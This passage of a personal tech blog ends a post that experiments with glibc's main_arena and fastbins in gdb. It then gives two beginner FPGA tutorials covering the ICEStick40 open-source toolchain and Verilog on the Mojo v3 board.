<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>}<span style="white-space: pre;"> </span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">}</span><br />
<div>
<br /></div>
I then ran this in gbd and set up an gdbinit to dump the <span style="font-family: "courier new" , "courier" , monospace;">main_arena</span>. Simple <span style="font-family: "courier new" , "courier" , monospace;">gdbinit</span> file:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">> cat ~/.gdbinit</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">define hook-stop</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>x/16xg 0x603000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>x/18xg &main_arena</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="white-space: pre;"> </span>info threads</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">end</span><br />
<div>
<br /></div>
<i>I also dump what is usually the start of the heap at 0x603000 when I'm launching in gdb and some thread information</i>. First thing I wanted to know was where each fastbin size goes according to practical demonstration the basic procedure was:<br />
<br />
<ol style="text-align: left;">
<li>Assign a bunch of chunks of a given size</li>
<li>free up all of them</li>
<li>at each free, check the main_arena <span style="font-family: "courier new" , "courier" , monospace;">fastbinsY</span> array contents</li>
</ol>
<div>
We of course need to know where fastbinsY starts, which gdb and glibc this is pretty easy, all you need to do is run it, set some break point and issue this command:</div>
<br />
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(gdb) x/1xg <b>&main_arena->fastbinsY</b></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">0x7ffff7dd1b28 <main_arena+8>:<span style="white-space: pre;"> </span>0x0000000000000000</span></div>
<br />
Pretty much the same as far as the other fields go if you're curious enough. Okay so we know where the <span style="font-family: "courier new" , "courier" , monospace;">fastbinsY</span> starts. Lets see what happens when we increase chunk size by 10 bytes everytime, basically I just ran <span style="font-family: "courier new" , "courier" , monospace;">arena.c</span> like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6toth7RCf7TqQWFuDlQh0zoXC2JF-OiaGTM-GqOEj8mZHlLLQaX6unRQ6CVW_gLm6ewr7_dTC5fmKsVwQaDGTf4PHHSfJe5WJlImllKKXCv3MGGKDysiRl3qILZuAwOAgrZ9Vhjd5hBc/s1600/test_gdb_run.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="727" data-original-width="1486" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6toth7RCf7TqQWFuDlQh0zoXC2JF-OiaGTM-GqOEj8mZHlLLQaX6unRQ6CVW_gLm6ewr7_dTC5fmKsVwQaDGTf4PHHSfJe5WJlImllKKXCv3MGGKDysiRl3qILZuAwOAgrZ9Vhjd5hBc/s640/test_gdb_run.png" width="640" /></a></div>
<br />
<div>
<br /></div>
<div>
The r 10 5 1 here means, run this with chunks of size 10 bytes, allocate an array of 5 chunks, and allocate and then deallocate them for 1 round. And after collecting enough data for size of chunks 10,20,30... until the <span style="font-family: "courier new" , "courier" , monospace;">fastbinsY</span> is no longer used I saw this:</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWULgKSItBimpkGCIZhWo8O11C6fJ1dj8_b7nZXGgVLy5ok_0Gyiau_lWCn4Cq76SBWgTXPCxNvGJPHDLZNZhTbS45G53DQMry5IkAGD1xhU-rPgFttnFOvyIlJaL_UyFkRnlvh-NMAOA/s1600/size_sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="411" data-original-width="1508" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWULgKSItBimpkGCIZhWo8O11C6fJ1dj8_b7nZXGgVLy5ok_0Gyiau_lWCn4Cq76SBWgTXPCxNvGJPHDLZNZhTbS45G53DQMry5IkAGD1xhU-rPgFttnFOvyIlJaL_UyFkRnlvh-NMAOA/s1600/size_sample.png" /></a></div>
<br />
<br />
So clearly as soon as a chunk is bigger than 120 bytes on my machine it will start becoming an unsorted bin. We can see this when we do a request for 130 byte chunks:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNk8d7fMollScBbFPNVPe1qx5eyHhfYyh6L87kbm3JeX4mTJ1DsgcC5Bqr_wJCVrvttcJmtG9_kYwFgOGKZD9pGWmfCl8lfPN7Uo1bHsyBts_i58eMcKyTq9XdiFpJdfM1uAz17nz3LXY/s1600/130_byte_read.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="614" data-original-width="856" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNk8d7fMollScBbFPNVPe1qx5eyHhfYyh6L87kbm3JeX4mTJ1DsgcC5Bqr_wJCVrvttcJmtG9_kYwFgOGKZD9pGWmfCl8lfPN7Uo1bHsyBts_i58eMcKyTq9XdiFpJdfM1uAz17nz3LXY/s1600/130_byte_read.png" /></a></div>
<br />
So what happens if you try to change main arena fields while the heap is use or while the program is running? Lets see:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioXBfNfR1-fDhpr7xvZC3ffQ1PT2DW7xo3L6PbXXOblXBql4syWVRjl2yfZpErxXVwRhgxyTHZ-iASjX8zjlHfGDXHfSy4tBL4FmpXTJL6J45qPe46DZ7aUlK4CbAPX3_CDO4E8KCV_u8/s1600/edit_arena_inflight.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="756" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioXBfNfR1-fDhpr7xvZC3ffQ1PT2DW7xo3L6PbXXOblXBql4syWVRjl2yfZpErxXVwRhgxyTHZ-iASjX8zjlHfGDXHfSy4tBL4FmpXTJL6J45qPe46DZ7aUlK4CbAPX3_CDO4E8KCV_u8/s1600/edit_arena_inflight.png" /></a></div>
<br />
Glibc will panic when you mess with the main_arena, but the error is interesting here its not about the main_arena its about the fastchunk. Which means some legitimate fastchunk stuff probably happened with the corrupted data? We can see what is happening here with another experiment, by looking at which field in the fastchunk actually ends up in the <span style="font-family: "courier new" , "courier" , monospace;">main_arena</span> by doing the following:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSyZcR-Hbrkw-kGtGzKLJQCKJpNzA4o8-QDrMlpDMBnkTpWv4ZNKBWjBLNH0dJpDlyrAlv8kaVFcUW6umNMGbkWdKTw5DC3pM-7a5wA52WsBgW88NJlY-i8yvVI9UV_6OJkaN12ee_msk/s1600/fake_fastbin_pointer_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="610" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSyZcR-Hbrkw-kGtGzKLJQCKJpNzA4o8-QDrMlpDMBnkTpWv4ZNKBWjBLNH0dJpDlyrAlv8kaVFcUW6umNMGbkWdKTw5DC3pM-7a5wA52WsBgW88NJlY-i8yvVI9UV_6OJkaN12ee_msk/s1600/fake_fastbin_pointer_1.png" /></a></div>
<br />
The screenshot above was produced by running the alloc/delloc for 2 rounds what I did was:<br />
<br />
<br />
<ol style="text-align: left;">
<li>assigned some chunks to prep the heap (<i>all the same size, running the same arena.c quoted above</i>)</li>
<li>then re-assigned them</li>
<li>and while in flight I tinkered with the main_arena pointers. </li>
</ol>
After injecting a sample pointer we can see that the <span style="font-family: "courier new" , "courier" , monospace;">0x434343</span> value gets pop'd into the main arena at the end of the error dump:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEV09pTg5e5CfDHoevyKWDda_6zNNO6vRQFYkf4aX0qS9v3z_Xbx22F5E5ybwmYDfVuuKuNuR1wUS17kC5LNc80bOyk_Ah0QV6oAbeM2wL3K97UrQzz3D97QVHxqgq7vRi3vowEW1u7Tc/s1600/fake_fastbin_pointer_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="1500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEV09pTg5e5CfDHoevyKWDda_6zNNO6vRQFYkf4aX0qS9v3z_Xbx22F5E5ybwmYDfVuuKuNuR1wUS17kC5LNc80bOyk_Ah0QV6oAbeM2wL3K97UrQzz3D97QVHxqgq7vRi3vowEW1u7Tc/s1600/fake_fastbin_pointer_2.png" /></a></div>
<br />
Pretty interesting! This field that gets pop'd out is none other than the <span style="font-family: "courier new" , "courier" , monospace;">mchunk->fd</span> pointer which would obviously point to the next free fast bin. So we now know that when a chunk is assigned the fd pointer is replaced with the previous one. Right now I can't really see a useful way to abuse this, it just opens up some behavior that may be useful later.<br />
<br />
That's going to be it for this one, next post is going to cover some stuff about the heap life cycle, which method actually get called when the heap sets up and tears down behind the scenes.</div>
<h2 style="text-align: left;">
References and Reading</h2>
<br />
<ol style="text-align: left;">
<li><a href="https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/malloc_state.html">https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/malloc_state.html</a> </li>
<li><a href="http://core-analyzer.sourceforge.net/index_files/Page335.html">http://core-analyzer.sourceforge.net/index_files/Page335.html</a> </li>
<li><a href="https://articles.forensicfocus.com/2017/10/16/linux-memory-forensics-dissecting-the-user-space-process-heap/">https://articles.forensicfocus.com/2017/10/16/linux-memory-forensics-dissecting-the-user-space-process-heap/</a> </li>
<li>Heap Consistency Chceking (GNU.org) <a href="https://www.gnu.org/software/libc/manual/html_node/Heap-Consistency-Checking.html#Heap-Consistency-Checking">https://www.gnu.org/software/libc/manual/html_node/Heap-Consistency-Checking.html#Heap-Consistency-Checking</a> </li>
<li>https://stackoverflow.com/questions/1665419/do-threads-have-a-distinct-heap </li>
</ol>
<br />
<br />
<br />
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-61286997383096200742019-03-06T18:19:00.002-08:002021-03-20T02:31:14.333-07:00[FPGAs] Introduction to the ICEStick40<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHRE-dxpP7AmFqpHMqnzmN8wCPQEObAF4CLGg2Zqc4Wj0ZlbiJ9cihv8QnR0Geogu7unejH9bgNduVyi1O78lzwL9pPCqepneUwJkFjqC2yEWHhtaZnElDl80cW1qGbaVA8uemsLn_TQ0/s1600/icestick_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="719" data-original-width="746" height="385" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHRE-dxpP7AmFqpHMqnzmN8wCPQEObAF4CLGg2Zqc4Wj0ZlbiJ9cihv8QnR0Geogu7unejH9bgNduVyi1O78lzwL9pPCqepneUwJkFjqC2yEWHhtaZnElDl80cW1qGbaVA8uemsLn_TQ0/s400/icestick_2.png" width="400" /></a></div>
<br />
FPGAs are arguably the best way to get into hardware reverse engineering for many reasons. The most obvious one according to me is the experience in what I've to term "raw clockiness" (<i>or the practice of making a real hardware backed clock; do exactly what you want</i>). There is a certain romanticism of freshly broken set theory and deep repressed proof theory sins that comes to bare for me when I'm exposed to this kind of computing. All other kinds tend to veil this shaky, sometimes deeply COUNTER intuitive means of problem solving :)<br />
<br />
Basically what I mean to say here is that if you can get over the hurdle with FPGAs (<i>which is not a big deal at all if you know basic set theory</i>) you've mastered many things that repeatedly form the base of the problems you'll need to solve in reverse engineering hardware questions like:<br />
<br />
<ul style="text-align: left;">
<li><b>What is this thing doing with that oscillator? What on earth can it possibly be doing?</b> <i>There are only so many combinatoric things that can happen based on the context and components / traces handling a signal or input - the more experience you have with raw signal programming the better you get to know these limitations and nuances. They are the most important rules of the game a lot of the time.</i> </li>
<li><b>Which one of these input/output signals is the clock / data etc etc based on what components are doing with it in context?</b> <i>Like an argument to a function in assembly you are trying to type based on its place in other functions and contexts.</i> </li>
<li><b>How does this thing receive its programming or settings? from where? how often?</b> <i>FPGAs are often volitile, they don't "store" their programming for ever it is constantly reprogrammed for use, programming is usually done via a micro-controller or anything that can squawk some bit stream into the chip really. </i></li>
<li><b>OMG is that an FPGA on the board?</b> <i>Sometimes things you are trying to identify can literally just straight up be FPGAs hehe</i></li>
</ul>
<br />
Anyway enough philosophical waxing (<i>jokes everything is a kind of soft philosophy to me now</i>); lets get into a quick example with the ICEStick. The reason I really really like this project is because its completely open source, you can get the ICEStick for super cheap on amazon and various other places; so its super easy to get started! All you need to do is download a couple things, write a make file and start pumping out bit streams that do the awesome things. In this post I'll cover all you need to do, to get that going.<br />
<br />
<h3>
Basic Workflow </h3>
Here are the basic steps:<br />
<br />
<ol style="text-align: left;">
<li>Write some verilog modules (<span style="font-family: "courier new" , "courier" , monospace;">*.v</span> files) - <i>obvious any text editor will do but vi(m) is always the best choice always. </i></li>
<li>Define a constraints file for your board (*.pcf files) - <i>this tells the other tools where to find what component when place n routing when producing the bitstream. You only need to do this once depending on which components you're using on which board. </i></li>
<li>Synthesize them into a bitstream (<span style="font-family: "courier new" , "courier" , monospace;">*.bin</span> files) - <i>for this we will use <span style="font-family: "courier new" , "courier" , monospace;">yosys</span></i></li>
<li>Produce some place n' route files (<span style="font-family: "courier new" , "courier" , monospace;">*.txt</span> files) - <i>our place n route tool here will be arachne-pnr (pnr stands for "place n route"</i></li>
<li>Program/flash the FPGA board with iceprog</li>
</ol>
<h3 style="text-align: left;">
Preparing the Environment</h3>
You need to grab a couple tools to get this all setup (most of the posts I link below mention other steps for various platforms) for this one I'm sticking to simple Ubuntu 18 LTS machine with nothing fancy installed except git. All you need to do is download a couple repositories and make + install them.<br />
<ol style="text-align: left;">
<li>install / make dependencies</li>
<li>install / make yosys, arachne-pnr, iceprog</li>
<li>Test build</li>
</ol>
I've whipped up a simple script that does all this for you, available on gist:<br />
<br />
<br />
<script src="https://gist.github.com/k3170makan/bd2bb317eb7f132bea7ed1b87cafe9d1.js"></script>
All you need to do is run this and it should sort everything. Could take a couple minutes.<br />
Once that's all done, make yourself a test folder and stick this convenient Makefile in their:<br />
<br />
<script src="https://gist.github.com/k3170makan/9444e44fb0d648506d9469b0dd068994.js"></script>
To use the make file you simply do the following:<br />
<ol style="text-align: left;">
<li>Replace the <span style="font-family: "courier new" , "courier" , monospace;">VER</span> variable with the name of the Verilog module you'd like to synthesize.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">make</span> (<i>make everything</i>).</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">make prog</span> (<i>program the most recent bitstream</i>).</li>
</ol>
Last thing you need to do, before writing some Verilog; is define a constraints file (*.pcf). You might notice that the tools we use here are not specifically for a particular board, they support a range of them. In order to make sure (<i>when you synthesize a bitstream</i>) that you're targeting the right board - you need to state some configurations for IOPins, clocks and other goodies you'd like the FPGA to interact with on the board, here's what the ICEStick40's .pcf file looks like:<br />
<br />
<script src="https://gist.github.com/k3170makan/c9451c3f4b3441c0b2306189ef526202.js"></script>
<br />
<h3 style="text-align: left;">
LED Blinker with ICEStick40</h3>
<br />
Once you've got everything up and running, you'll be able to whip up a simple LED Blinker like so:<br />
<br />
<script src="https://gist.github.com/k3170makan/e45447f4da043b3690020f1e0dd88790.js"></script>
Good thing here is that this works pretty much like any other LED blink counter, it just maps some reg's to the LEDs, and flips them on and off using a clock pre-scaler that reduces it to 1Hz (using a 21 bit reg array). If you're confused about these words its totally cool, I have some blog posts on the way that explain how they work in full. For now just make sure you can get your environment working, making sure you understand the code is a workable problem, but only if you can actually hit the FPGA with the right stuff.<br />
<br />
If you compile this using my Makefile (or not), you should see something like the following output (<i>luckily because yosys and the pnr tools are pretty verbose, you will be able to trace quite a bit of activity if things are going funky</i>):<br />
<br />
<script src="https://gist.github.com/k3170makan/40eae7580a1f5630a53d882002597639.js"></script>
<br />
Last step is actually programming the FPGA with the bitstream we just generated, here's what the output is meant to look like:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">>sudo make prog</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">iceprog example.bin </span><br />
<span style="font-family: "courier new" , "courier" , monospace;">init..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cdone: high</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">reset..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cdone: low</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">flash ID: 0x20 0xBA 0x16 0x10 0x00 0x00 0x23 0x64 0x34 0x65 0x04 0x00 0x22 0x00 0x32 0x27 0x12 0x16 0xFE 0x6A</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">file size: 32220</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">erase 64kB sector at 0x000000..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">programming..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">reading..</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">VERIFY OK</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cdone: high</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Bye.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilLESxUUVYLgJLuBOgEpgmeFvqNhP2rdpyvGVutUFhlmEZrUwO3pHfTJovNQch77q9yRLxP_ky9cALcDZlncvO9XGVmIuC07zP6DSEeLJhag2IZ-pA6ShF9NAuPJ8qbAxT6ESZseRJlM4/s1600/ezgif.com-video-to-gif.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="338" data-original-width="600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilLESxUUVYLgJLuBOgEpgmeFvqNhP2rdpyvGVutUFhlmEZrUwO3pHfTJovNQch77q9yRLxP_ky9cALcDZlncvO9XGVmIuC07zP6DSEeLJhag2IZ-pA6ShF9NAuPJ8qbAxT6ESZseRJlM4/s640/ezgif.com-video-to-gif.gif" width="640" /></a></div>
<br />
<br />
That's it for this one folks.<br />
<h3 style="text-align: left;">
<br />References and Reading</h3>
<ol style="text-align: left;">
<li><a href="https://appcodelabs.com/getting-started-with-lattice-icestick-using-open-source-tools-on-macos-linux">https://appcodelabs.com/getting-started-with-lattice-icestick-using-open-source-tools-on-macos-linux</a></li>
<li>Various ICEStick posts from hackaday <a href="https://hackaday.com/tag/icestick/">https://hackaday.com/tag/icestick/</a> </li>
<li><a href="http://www.clifford.at/icestorm/">http://www.clifford.at/icestorm/</a> </li>
</ol>
<br />
<br />
<ul style="text-align: left;">
</ul>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-28697607851018576472019-01-28T16:50:00.001-08:002019-01-28T18:06:04.571-08:00[FPGAs] (Introduction to FPGAs) :: an LED Blinker with Mojo v3<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3jqfIVGiCCvQOe4TOP42-aarnlCGoSJAwztJ2Ds48gQAdkkraXQW8v3iACgDVIJWpYHiYCqZr0mOfjCGF1XjLjNVV6slpRuKJzr1DvqQCx4IXnhfmD1ehvY59aMR2EGRHNhvf2q1nq70/s1600/Screenshot+from+2019-01-28+17-09-26.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="667" data-original-width="772" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3jqfIVGiCCvQOe4TOP42-aarnlCGoSJAwztJ2Ds48gQAdkkraXQW8v3iACgDVIJWpYHiYCqZr0mOfjCGF1XjLjNVV6slpRuKJzr1DvqQCx4IXnhfmD1ehvY59aMR2EGRHNhvf2q1nq70/s1600/Screenshot+from+2019-01-28+17-09-26.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Wiring my board up to an LCD screen on top of a copy of Hegel's Aesthetics. </td></tr>
</tbody></table>
<br />
Hi folks, in this post I'm going to give you as gentle and introduction to FPGA (<i>I will unpack the acronym later</i>) programming as possible, hopefully explaining as much as I know (<i>which is a very little up to this point, but enough to I guess help some folks so</i>), while providing lots of examples and challenges for folks who need ideas to try out that are easy enough to get a foothold.<br />
<br />
If you're familiar with any programming you should have enough to get going in Verilog it just requires a bit of re-orientation and practice -<i> just like any language basically</i> ;)<br />
<br />
To start lets think about what we are going to do here, FPGAs are pieces of hardware that we can configure. That configuration is done by taking the language we speak (<i>which is English/Human-Language equivalent Verilog</i>); and converting it, into that configuration for the FPGA, this is configuration is called a bit stream.<i> A bit stream is what the final effort of "synthesizing" is essentially; its kind of like putting together a little song for the chip that the computer tweets over lovingly, lullying it into total subservience.</i><br />
<br />
There are many different kind so FPGAs so you can play little songs to many different kinds of chips, the tunes are ever wilder, faster and more exciting the more powerful the chips get - <i>I've only programmed like one so far</i>. But have a shop around, there are tons of boards and kits out there that aren't that expensive, some of them are open source as well! I'm going to use the Mojo v3 in this post though (<i>purely because its a well documented board, there's a book out on it as well</i>); i thought it would be an easy way to start. <i>I will definitely cover more open source FPGA tech as well in future :P. </i><br />
<i><br /></i>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNs4LkyIkUygUYWJXL6XKKsH2GgC4PX3fg4dk5i4m0sn-eGaHfWbhOscagO2EUbsNrbvhL8Pks4cUQ_66PnPKY0tiFCeCgSyt0TzkaisoFpZ8k_oF4mvqKo4Ar8r0bHbjm_K-Kpfrfxo8/s1600/Screenshot+from+2019-01-28+17-09-58.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="597" data-original-width="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNs4LkyIkUygUYWJXL6XKKsH2GgC4PX3fg4dk5i4m0sn-eGaHfWbhOscagO2EUbsNrbvhL8Pks4cUQ_66PnPKY0tiFCeCgSyt0TzkaisoFpZ8k_oF4mvqKo4Ar8r0bHbjm_K-Kpfrfxo8/s1600/Screenshot+from+2019-01-28+17-09-58.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Mojo V3 in a super hipster instagram filter</td></tr>
</tbody></table>
<i><br /></i>
<h2 style="text-align: left;">
What are FPGAs</h2>
FPGAs (Field Programmable Gate Arrays - <i>see told'cha</i>) are essentially a very very small grid of <i>(usually thousands</i>) of configurable circuits. FPGAs provide a way to describe combinations of these small configurable circuits that are provably analogous (<i>intended to work exactly the same as</i>) some hardware description language.<br />
<br />
To configure the circuitry I mentioned, you essentially tell the FPGA what to tell its different components.<i> This list might be a ton of information but its not super crucial you understand it, you can program a board fine without knowing any of this, its just good to know about it so you can be a little more aware of what you're doing. </i><br />
<br />
These different components of an FPGA are of the following (<i>some manufacturers may differ in many ways</i>):<br />
<br />
<ul style="text-align: left;">
<li><b>Programmable Interconnects (Points) </b>(PIPs) : These are (according to my sources [2]) basically blocks of circuitry that allow you to route signals between CLBs. </li>
</ul>
<ul style="text-align: left;">
<li><b>Controllable Logic Blocks</b> (CLBs) : This component of the FPGA is where most of the magic happens, the more CLBs an FPGA has the more data it can store and process essentially. The CLBs have a couple of components to them:</li>
</ul>
<ul style="text-align: left;">
<ul>
<li><b>Flip Flops</b> : these are for responding to clocked events, storing data (<i>I will explain how this happens later</i>). You will essentially orientate your programming to leverage these Flip Flops to modify information in response to clock events (when the clock signal goes from high to low or vice versa). <i>This I think why they are called" flip flops" because they allow you to flip flop along with the clock lol. </i></li>
<li><b>Internal RAM</b>: for configuring Look up tables (LUTs), these are basically just switch statements of a certain kind, they hold configurations for the <i>logic </i>components[2] inside the CLB. </li>
<li><b>Multiplexers </b>: These essentially take in multiple input signals and combined them into fewer output signals or as one post puts it:</li>
</ul>
</ul>
<blockquote class="tr_bq" style="text-align: left;">
The multiplexer, shortened to “MUX” or “MPX”, is a combinational logic circuit designed to switch one of several input lines through to a single common output line by the application of a control signal. [6]</blockquote>
<ul style="text-align: left;">
<li><b>Configurable I/O Blocks </b>(IO Blocks) : These are basically input/output points (or if you like <i>ports</i>), that allow you to tap signals into the FPGA, or push out signals from the FPGA. A simple example would be turning on an LED, you will need some place to stick the LED 'into' to make it turn on, the I/O block is where this signal for the LED will get fed from. Please don't stick LEDs directly into your I/O ports on your boards I'm just making an analogy - <i>I will most likely cover a simple external LED tutorial as well, because its pretty vital in the journey to more complex external stuff ;)</i>. The I/O blocks have components to them as well, these essentially allow you to respond to the signal when it makes a certain transition or takes a certain state.</li>
</ul>
<blockquote class="tr_bq" style="text-align: left;">
The high or low state of the signal is called the logic level. If we tell a circuit to respond to an event when an input signal is high, the input is referred to as active high. When we tell it to respond to an input signal is low, guess what its called active low! </blockquote>
<div>
Check out [2] in the Reading and References section for cool pictures about it.<br />
<br /></div>
Anyway its basically like play dough for hackers and electrical engineers. They aren't hard to get your head around but the can be very very useful when you do! I think getting over the FPGA hill is a very important step in your career as a hacker (<i>just my opinion lets say</i>).<br />
<br />
<h2 style="text-align: left;">
What you will need</h2>
<div>
<b>DISCLAIMER:</b> The current tutorial involves giving your address to the Xilinx folks (<i>I think this is because of US Export laws</i>) which is pretty crappy not for any other reason than its private information and it can be mistreated, lost or stolen. So if you're not up for that, please just follow along for interests sake I promise I will provide fully open source no address information bribery required - tutorials as well. <br />
<br />
But, if you're okay with the Xilinx folks knowing where you live and that you're learning the dangerous sorcery of FPGA hardware - please go download the Xilinx ISE below. </div>
<br />
<ul style="text-align: left;">
<li>Mojo V3 Board available at amazon[10], SparkFun[9], Alchitry [8] and I'm sure a ton of other places. </li>
<li>Xilinx ISE available at <a href="https://www.xilinx.com/">https://www.xilinx.com/</a> (Sign up for an account and download the ISE)</li>
<li> USB 3.0 to Micro-B cable</li>
<li>Mojo Loader (for loading your program onto the board)</li>
<li>Mojo IDE (provides a different interface for verilog programing, simpler but less specific than the ISE verilog IDE) Mojo IDE also comes with its own programming variant called Lucid: <a href="https://alchitry.com/pages/lucid">https://alchitry.com/pages/lucid</a> </li>
</ul>
<div>
You will need to install the ISE on which ever platform you like (<i>I suggest using Linux based one's its just way easier and doesn't require a ton of driver drama</i>). For more information how to get that going please see the following example: <a href="https://alchitry.com/pages/installing-ise">https://alchitry.com/pages/installing-ise</a> .</div>
<div>
<br />
<br /></div>
<h2 style="text-align: left;">
Verilog Crash Course</h2>
<div>
<br /></div>
<div>
I'm going to be doing this tutorial in Verilog; realizing this can be a bit of an obscure language (<i>I agree it is obscure - but for no super hard to understand reason to be honest</i>) you might need a bit of a jump start into to it if you've not ever done it before, <i>but don't fret the whole point of this blog post is to try to explain this to someone who's never done it before</i>. </div>
<div>
<br /></div>
<div>
Lets get to it, Verilog is a hardware description language, we call Verilog hardware language register-transfer-level (or its an RTL language); this wording is meant to describe what Verilog targets with its abstraction, essentially the transfer of signals between hardware level registers (and other components) [11,12,13,14]. Anyway once you have everything installed according to the tutorials above; you can then start scripting some Verilog for the Mojo.<br />
<br />
Here's what a bare bones Verilog script looks like:</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">module hello_verilog(input clk, output external_led)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> always @ (posedge clk) begin</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> external_led <= clk ^ external_led; </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"> end</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">endmodule </span></div>
<div>
<br /></div>
<div>
This is just an example Verilog script to show how elements of the language work, it probably won't achieve anything profound if it were implemented as a real Verilog module on an actual FPGA though (<i>this is because of the frequency of the clock - more on this later</i>). And the reason is something that I need to cover before I can show you a real Verilog script.<br />
<br />
Anyway, before we unpack that; lets take a look at this script and explain each part.</div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">module hello_verilog(input clk, output external_led);</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">...</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">endmodule</span></div>
<div>
<br /></div>
<br />
This is the module header; it declares the inputs and outputs of the module begin defined here. Also it obviously needs to have a declared <span style="font-family: "courier new" , "courier" , monospace;">endmodule </span>as well.<br />
<br />
These inputs and outputs (<i>and I'm no deep expert here</i>) can essentially be driven by the I/O blocks - depending on what you feed the module as inputs. So if you want to drive in some external module with pins the FPGA board needs to talk to (<i>like a logic analyzer or oscilloscope</i>) - these input / output declarations are what you designate them as.<br />
<br />
The next section of code I want to get around is this:<br />
<br />
